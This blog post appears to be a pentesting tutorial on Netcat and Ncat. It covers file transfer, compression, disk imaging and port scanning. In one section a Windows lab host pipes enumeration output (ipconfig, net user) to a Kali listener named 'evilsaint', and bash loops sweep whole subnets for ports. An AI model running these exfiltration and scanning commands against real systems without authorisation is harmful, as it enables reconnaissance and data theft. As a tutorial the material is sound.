8 Jun 2022, 2:20 p.m.
05:06 minutes

This article looks at Netcat, a valuable tool in the pentesters toolbox. Hobbit released the original Netcat in 1995, but it hasn’t been maintained despite its popularity. It can sometimes be hard to find a copy of the v1.10 source code. The flexibility and usefulness of this tool prompted the Nmap Project to produce Ncat, a modern reimplementation that supports SSL, IPv6, SOCKS and HTTP proxies, connection brokering, and more.


    First some brief points about Netcat - All official versions are free of charge - Works natively on Linux. - Works natively on Apple Mac OS X. - Works natively on Microsoft Windows. - Features a command-line interface. - Source code available for inspection. - General-purpose tools - Packet crafting tools

    The ncat tool is a much better option in place of netcat or nc.

    We think ncat is better because of its support for multiple protocols and simultaneous connections and SSL.


    This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool to use directly or easily drive by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections.

    Netcat can operate in environments where you have low privileges, plus it is a standalone binary, meaning you can upload it to an environment and run it as is. Be warned that file transfers using Netcat are not encrypted, anyone on the network can grab what you are sending, so use this only on trusted networks.

    Standard Listen and Send

    setup netcat in listening mode and save whatever is received to in.txt

    root@box:/tmp/netcat# nc -w 1 -l -p 3000 > in.txt

    From the sending end, we can pipe in a file called out.txt and send it to our listener.

    nc -w 3 [destination] 3000 < out.txt

    Piping input

    We can send data by sending output through a pipe to Netcat. Here we are outputting a file, but it could be several items.

    C:\Documents and Settings\user> type c:\test.txt | c:\nc.exe 3000 -w1

    On our kali box, we can set a while loop like follows.

    root@evilsaint:/pentesting/enum# while true; do nc -w 4 -lvp 4321 >> enum.txt; done

    And we can pipe enumeration commands back to our box.

    C:\Users\labuser.ACME\Desktop\netcat-win32-1.12>ipconfig | nc64.exe 4321 -w 3
    C:\Users\labuser.ACME\Desktop\netcat-win32-1.12>net user | nc64.exe 4321 -w 3
    C:\Users\labuser.ACME\Desktop\netcat-win32-1.12>net account | nc64.exe 4321 -w 3

    Send with Compression (Linux to Linux)

    On the receiving end

    nc -l -p 1234 | uncompress -c | tar xvfp -

    On the sending end

    tar cfp - /some/dir | compress -c | nc -w 3 [destination] 1234

    Sending a harddrive

    It is possible using Netcat to pipe a hardrive

    On the sender end run

    dd if=/dev/hda3 | gzip -9 | nc -l 3333

    On the receiver end,

    nc [destination] 3333 | pv -b > hd-image.img.gz

    Port Scanning with Netcat

    TCP scan of ports 3385 to 3395

    nc -nvv -w 1 -z 3385-3395

    UDP scan of ports 3385 to 3395

    nc -unvv -w 1 -z 3385-3395

    Small Bash Loop to loop through all the ports from 1 to 65535 for one IP

    for i in $(seq 1 65535); do nc -nv -w 1 -z $i ; done

    Small Bash Loop to loop through all the IPs on our subnet and scan for ports 21-25

    for i in {1..254}; do nc -vv -n -w 1 10.0.0.$i 21-25 -z; done
    Option Description
    -n don’t resolve first just use the IP address and don’t try and use DNS to get a hostname
    -vv single -v is verbose, double v -vv is extra verbosity.
    -u UDP mode.
    -w equals the timeout in seconds for net reads
    -z Zero I/O mode used for scanning.

    Makeshift Permanent Netcat Listener

    nohup is a program you can use to run your application with such that its stdout/stderr can be sent to a file instead and such that closing the parent script won’t SIGHUP the child. However, you need to have the foresight to use it before starting the application. Because of how nohup works, you can’t just apply it to a running process.

    disown is a bash builtin that removes a shell job from the shell’s job list. This means that you can’t use fg, bg on it anymore, but more importantly, when you close your shell, it won’t hang or send a SIGHUP to that child anymore. Unlike nohup, disown is used after the process has been launched and backgrounded.

    Make a Netcat listener persistent.

    while(1) nohup netcat -lvp 4444

    Captcha: What's the standard TCP port of the following service?